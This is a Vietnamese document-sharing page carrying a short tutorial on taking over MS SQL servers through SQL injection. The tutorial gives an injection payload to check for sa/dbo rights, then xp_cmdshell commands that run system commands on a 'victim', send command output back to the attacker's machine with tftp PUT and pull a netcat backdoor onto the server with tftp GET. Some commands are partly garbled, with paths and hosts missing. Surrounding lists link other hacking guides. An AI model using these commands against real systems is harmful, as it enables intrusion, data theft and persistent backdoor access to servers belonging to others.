Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Sức khỏe - Y tế
Văn bản luật
Nông Lâm Ngư
Kỹ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Giới thiệu
Đăng ký
Đăng nhập
Tìm
Danh mục
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Y tế sức khỏe
Văn bản luật
Nông lâm ngư
Kĩ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Thông tin
Điều khoản sử dụng
Quy định bảo mật
Quy chế hoạt động
Chính sách bản quyền
Giới thiệu
Đăng ký
Đăng nhập
0
Trang chủ
Công Nghệ Thông Tin
An ninh - Bảo mật
Hack Server bị SQL Injection
tailieunhanh - Hack Server bị SQL Injection
Để check bạn có thể làm sau đây trên inject link [injection link]’ %2b convert (int,(system_user())— Nếu KQ là ‘sa’ hoặc ‘dbo’ có lẽ bạn có thể tấn công được rồi. Nếu bạn có ‘sa’ hoặc ‘dbo’ nhưng mà admin lại không cho sử dụng cmdshell bạn hãy bật nó lên (bật thế nào tự tìm hiểu nhé ) | Hack Server bị SQL Injection trang này đã được đọc lần 1)Tỷ lệ thành công 80%: Điều kiện server phải là winnt và user dùng để inject là user có quyền dùng xp_cmdshell (sa, dbo) Để check bạn có thể làm sau đây trên inject link [injection link]’ %2b convert (int,(system_user())— Nếu KQ là ‘sa’ hoặc ‘dbo’ có lẽ bạn có thể tấn công được rồi. Nếu bạn có ‘sa’ hoặc ‘dbo’ nhưng mà admin lại không cho sử dụng cmdshell bạn hãy bật nó lên (bật thế nào tự tìm hiểu nhé ) Lưu ý : bạn sẽ chỉ hack được vào server chứa database của nó thôi (nhiều khi đặt database chung với host J ) Các tool cần thiết : client . Nó hoạt động tương tự như FTP nhưng đơn giản hơn nhiều , thông qua port 69, và một ưu điểm, nó không cần password (đây là điều quan trọng để ta hack) Vào DOS gõ tftp /? -> Bạn sẽ được cú pháp của nó như sau : TFTP [-i] host PUT || GET filename [vị trí file muốn gửi đến] -i : nếu bạn cần truyền một file dạng binary hãy sử dụng nó host : IP của máy server PUT : nếu bạn muốn send file GET : nếu bạn muốn lấy file Ví dụ về một lệnh tftp : Tftp –i PUT C: Sẽ lấy file trên máy server (máy có IP xxx .) và chuyển vào C: trên máy client (máy đã gõ lệnh trên) Bây giờ ta sẽ test trực tiếp trên localhost. bạn hãy mỡ tftpd32 lên để biến máy mình thành một server tftp (lưu ý phải tắt hết firewall giao thức mới thực hiện tốt) Trong tftpd32 có phần BASE directory mặc định là [path to]tftpd32e, nó sẽ là thư mục đặt các file up hoặc download của bạn khi thực hiện trao đổi file với client (vì bạn là server) (bạn có thể change nếu thích). Trong bài này tôi dùng [link] thay cho link các bạn inject, hãy chỉnh lại cho phù hợp để run exec (thêm (‘), ( nếu cần ) Và dùng để thay cho Ip của các bạn (nó sẽ hiển thị khi các bạn bật tftpd32) +Tấn công thực sự: ------------BEGIN-------------- Command1 : RUN COMMAND DOS trên máy victim : [link] exec masterxp_cmdshell ‘[command]’ Command 2 : DOWNLOAD FILE từ máy victim [link] exec masterxp_cmdshell ‘tftp PUT [path][filecandown]’ Ví dụ : Lấy Ip máy victim : (1)[link] exec masterxp_cmdshell ‘ipconfig > ’ (2)[link] exec masterxp_cmdshell ‘tftp PUT ’ ----Giải thích : (1) : run lệnh này : ipconfig > tạo file với nội dung là kết quả của lệnh ipconfig (2) : run tftp PUT chuyển file với nội dung vừa tạo --> server (máy chúng ta ) Command3 : UPLOAD BACKDOOR lên máy victim : [link] exec masterxp_cmdshell ‘tftp [–i] GET backdoor [path muon backdoor được đặt]’ ví dụ : upload netcat vào C:WINNT: [link] exec masterxp_cmdshell ‘tftp –i GET C:’ ---------------END--------------- 3) Kết: Như vậy chúng ta đã biết cách run command (bạn có thể run file exe ) , biết down, up file, hầu như đã làm chủ được server rồi đấy . Còn hack nhanh hay chậm, hiệu quả bao nhiêu là do bạn
Nhật Hùng
52
2
doc
Báo lỗi
Trùng lắp nội dung
Văn hóa đồi trụy
Phản động
Bản quyền
File lỗi
Khác
Upload
Tải xuống
đang nạp các trang xem trước
Bấm vào đây để xem trước nội dung
Tải xuống
TÀI LIỆU LIÊN QUAN
Một số thủ thuật hack forum
2
91
0
Giới thiệu phương pháp Hack Local
2
66
0
Hướng dẫn Hack lỗi PHP
1
75
0
Các hacker trình diễn kỹ thuật hack tại Hội thảo an ninh mạng
2
60
1
Change password admin , hack win2k
3
58
0
Site hack đầu tay
1
84
0
Hack acc bằng ENT3
2
69
0
Hack hotmail, aol, yahoo, icq pass, nếu victim dùng trillian
11
113
2
Hack Apache server
2
87
0
Hack blackhatvn.org
2
67
0
TÀI LIỆU XEM NHIỀU
Một Case Về Hematology (1)
8
461949
55
Giới thiệu :Lập trình mã nguồn mở
14
23138
64
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
10990
531
Câu hỏi và đáp án bài tập tình huống Quản trị học
14
10188
451
Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3
9572
106
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8398
1136
Tiểu luận: Nội dung tư tưởng Hồ Chí Minh về đạo đức
16
8278
423
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
7896
2234
Đề tài: Dự án kinh doanh thời trang quần áo nữ
17
6839
256
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
6145
1488
TỪ KHÓA LIÊN QUAN
An ninh - Bảo mật
hack account
bảo mật máy tính
tài liệu về hack
quy tắc bảo vệ máy tính
Hacking cổ điển
phòng chóng hacker
TÀI LIỆU MỚI ĐĂNG
Đề tài: Tìm hiểu một số yêu cầu đặt ra với một phòng thu âm, để đảm bảo chất lượng âm thanh trong sản phẩm đa phương tiện
8
171
1
22-05-2024
QUẢN LÝ CHẤT LƯỢNG KHÔNG KHÍ
75
145
0
22-05-2024
báo cáo hóa học:" Increased androgen receptor expression in serous carcinoma of the ovary is associated with an improved survival"
6
108
0
22-05-2024
Báo cáo nghiên cứu khoa học " HÃY LÀM CHO HUẾ XANH HƠN VÀ ĐẸP HƠN "
6
132
0
22-05-2024
báo cáo hóa học:" Perceptions of rewards among volunteer caregivers of people living with AIDS working in faith-based organizations in South Africa: a qualitative study"
10
93
0
22-05-2024
Sử dụng mô hình ARCH và GARCH để phân tích và dự báo về giá cổ phiếu trên thị trường chứng khoán
24
1028
0
22-05-2024
Giáo trình tiếng anh chuyên ngành kỹ thuật phục vụ nhà hàng part 4
35
202
0
22-05-2024
Bí quyết trị mụn cho da bằng trái cây
6
107
0
22-05-2024
Báo cáo " Thực thi một số cam kết quốc tế của Việt Nam về biến đổi khí hậu "
9
123
0
22-05-2024
Microsoft SQL Server 2012 T-SQL Fundamentals
442
98
0
22-05-2024
TÀI LIỆU HOT
Mẫu đơn thông tin ứng viên ngân hàng VIB
8
7896
2234
Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152
6145
1488
Ebook Chào con ba mẹ đã sẵn sàng
112
3789
1255
Ebook Tuyển tập đề bài và bài văn nghị luận xã hội: Phần 1
62
5426
1140
Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249
8398
1136
Giáo trình Văn hóa kinh doanh - PGS.TS. Dương Thị Liễu
561
3552
656
Giáo trình Sinh lí học trẻ em: Phần 1 - TS Lê Thanh Vân
122
3759
544
Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13
10990
531
Giáo trình Pháp luật đại cương: Phần 1 - NXB ĐH Sư Phạm
274
4172
523
Bài tập nhóm quản lý dự án: Dự án xây dựng quán cafe
35
4193
483
crossorigin="anonymous">
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.